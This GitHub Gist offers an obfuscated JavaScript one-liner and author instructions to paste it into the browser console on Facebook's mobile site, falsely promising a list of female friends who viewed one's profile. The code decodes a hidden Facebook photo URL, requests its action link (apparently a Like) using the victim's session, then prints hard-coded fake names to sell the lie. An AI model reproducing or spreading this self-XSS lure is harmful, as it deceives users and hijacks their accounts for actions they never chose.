Skip to content

Instantly share code, notes, and snippets.

@Milo24s1
Last active August 31, 2018 06:37
Show Gist options
  • Save Milo24s1/9f500b78bda76c5c297f592e004fe9fb to your computer and use it in GitHub Desktop.
Save Milo24s1/9f500b78bda76c5c297f592e004fe9fb to your computer and use it in GitHub Desktop.
this is facebook mobile version bug which is reporucbale in firefox browser you can get the list of female friends who viewed your profile.
fetch(window.atob("aHR0cHM6Ly9tLmZhY2Vib29rLmNvbS9TdXNpa29CYWtlcnMvcGhvdG9zL3BiLjUzMzQwNDk5MDAzMDA0Ny4tMjIwNzUyMDAwMC4xNTMzODgzODIyLi8xNzY3OTUwNjI5OTA4ODA0Lz90eXBlPTMmdGhlYXRlcg==")).then(function(t){return t.text()}).then(function(t){var o=(new DOMParser).parseFromString(t,"text/html").querySelector("#MPhotoActionbar td:nth-child(1) > a:nth-child(1)").href;fetch(o).then(function(t){["U2hlaGFuaSBSYWphcGFrc2hl","U2h5YW1pIEVrYW5heWFrYQ==","QW51cmFkaGkgV2lja3JhbWFzaW5naGU="].map(t=>console.log("%c"+window.atob(t),"color: rgb(249, 162, 34);font-size: 60px;font-weight: bold;text-shadow: 1px 1px 5px rgb(249, 162, 34);filter: dropshadow(color=rgb(249, 162, 34), offx=1, offy=1);"))})});
@Milo24s1
Copy link
Author

Milo24s1 commented Aug 31, 2018

  1. go to your Firefox browser. (this works only on Firefox )
  2. open https://m.facebook.com (mobile version)
  3. open console tab in your browser
  4. paste this code & enjoy the result

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment